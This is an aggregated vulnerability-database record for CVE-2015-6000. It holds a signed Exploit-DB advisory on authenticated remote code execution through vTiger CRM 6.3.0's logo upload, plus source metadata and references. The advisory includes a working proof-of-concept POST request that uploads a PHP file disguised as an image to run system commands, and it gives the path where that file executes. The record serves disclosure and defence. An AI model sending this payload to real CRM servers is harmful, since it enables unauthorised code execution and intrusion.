ID

VAR-E-201509-0121


CVE

cve_id:CVE-2015-6000

Trust: 3.2

cve_id:CVE-2016-1713

Trust: 1.5

sources: PACKETSTORM: 133755 // PACKETSTORM: 148753 // EXPLOIT-DB: 38345 // EDBNET: 59458 // EDBNET: 23912

EDB ID

38345


TITLE

vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38345

DESCRIPTION

vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution. CVE-2016-1713CVE-2015-6000CVE-128170 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 38345

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:6.3.0

Trust: 1.0

vendor:vtigermodel:crmscope:eqversion:6.3

Trust: 0.5

vendor:vtigermodel:crm authenticated logo upload remotescope:eqversion:6.3.0

Trust: 0.5

sources: PACKETSTORM: 133755 // PACKETSTORM: 148753 // EXPLOIT-DB: 38345

EXPLOIT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html

=== Description ===

Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.

Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html

=== PoC ===

Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:

POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040

-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"

[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg

<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]

The resulting PHP file can then be accessed at

[Vtiger URL]/test/logo/2.php

- --
Benjamin Daniel MUSSLER

Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)

iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----

Trust: 1.0

sources: EXPLOIT-DB: 38345

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38345

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38345

TYPE

(Authenticated) Remote Code Execution

Trust: 1.0

sources: EXPLOIT-DB: 38345

TAGS

tag:exploit

Trust: 1.0

tag:remote

Trust: 0.5

tag:code execution

Trust: 0.5

tag:php

Trust: 0.5

sources: PACKETSTORM: 133755 // PACKETSTORM: 148753

CREDITS

Benjamin Daniel Mussler

Trust: 0.6

sources: EXPLOIT-DB: 38345

EXTERNAL IDS

db:NVDid:CVE-2015-6000

Trust: 3.8

db:EXPLOIT-DBid:38345

Trust: 1.6

db:NVDid:CVE-2016-1713

Trust: 1.5

db:EDBNETid:81484

Trust: 0.6

db:EDBNETid:59458

Trust: 0.6

db:0DAYTODAYid:24304

Trust: 0.6

db:EDBNETid:23912

Trust: 0.6

db:PACKETSTORMid:133755

Trust: 0.5

db:PACKETSTORMid:148753

Trust: 0.5

sources: PACKETSTORM: 133755 // PACKETSTORM: 148753 // EXPLOIT-DB: 38345 // EDBNET: 81484 // EDBNET: 59458 // EDBNET: 23912

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-6000

Trust: 3.2

url:https://nvd.nist.gov/vuln/detail/cve-2016-1713

Trust: 1.5

url:http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/38345/

Trust: 0.6

url:https://0day.today/exploits/24304

Trust: 0.6

sources: PACKETSTORM: 133755 // PACKETSTORM: 148753 // EXPLOIT-DB: 38345 // EDBNET: 81484 // EDBNET: 59458 // EDBNET: 23912

SOURCES

db:PACKETSTORMid:133755
db:PACKETSTORMid:148753
db:EXPLOIT-DBid:38345
db:EDBNETid:81484
db:EDBNETid:59458
db:EDBNETid:23912

LAST UPDATE DATE

2022-07-27T09:29:58.359000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:133755date:2015-09-29T01:09:53
db:PACKETSTORMid:148753date:2018-07-30T22:24:57
db:EXPLOIT-DBid:38345date:2015-09-28T00:00:00
db:EDBNETid:81484date:2015-09-29T00:00:00
db:EDBNETid:59458date:2015-09-28T00:00:00
db:EDBNETid:23912date:2015-09-28T00:00:00